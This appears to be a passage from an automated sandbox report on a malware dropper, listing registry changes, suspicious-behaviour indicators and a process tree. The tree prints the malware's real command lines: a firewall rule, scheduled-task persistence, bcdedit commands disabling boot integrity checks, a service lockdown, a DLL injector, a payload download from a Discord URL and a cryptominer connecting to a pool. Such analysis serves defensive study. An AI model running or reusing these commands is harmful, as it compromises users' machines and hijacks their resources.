Africa Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. 
Australia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) 
\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe 
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1208 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 480 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 2480 vgtejgi 336 RuIUvkS8wVfymaAK7lF9BY8u.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1260 AddInProcess32.exe Token: SeDebugPrivilege 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe Token: SeImpersonatePrivilege 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeSystemEnvironmentPrivilege 2064 csrss.exe Token: SeSecurityPrivilege 1892 sc.exe Token: SeSecurityPrivilege 1892 sc.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 1636 powershell.exe Token: SeShutdownPrivilege 336 powercfg.exe Token: SeShutdownPrivilege 1716 powercfg.exe Token: SeShutdownPrivilege 656 powercfg.exe Token: SeShutdownPrivilege 2408 powercfg.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeShutdownPrivilege 876 powercfg.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 928 powercfg.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeLockMemoryPrivilege 2460 explorer.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2656 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 
AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- DcRat
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe"C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1744
-
-
C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp"C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp" /SL5="$5015A,1697450,56832,C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵
- Executes dropped EXE
PID:2304
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵
- Executes dropped EXE
PID:448
-
-
-
-
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972 -
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"4⤵
- DcRat
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2924
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:316
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1956 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2596
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1396
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1948
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:3020
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2332
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2128
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:2280
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:2540
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:2120
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:2408
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:888
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:2932
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1248
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:2012
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:1756 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2868
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:443 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:80 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --nicehash --http-port 3433 --http-access-token 234c6d18-3256-488e-b465-c4f656ececdc --randomx-wrmsr=-17⤵PID:1960
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 19607⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵PID:1968
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:604
-
-
-
-
-
C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe"C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:992
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2656 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:3040
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2856
-
-
-
-
-
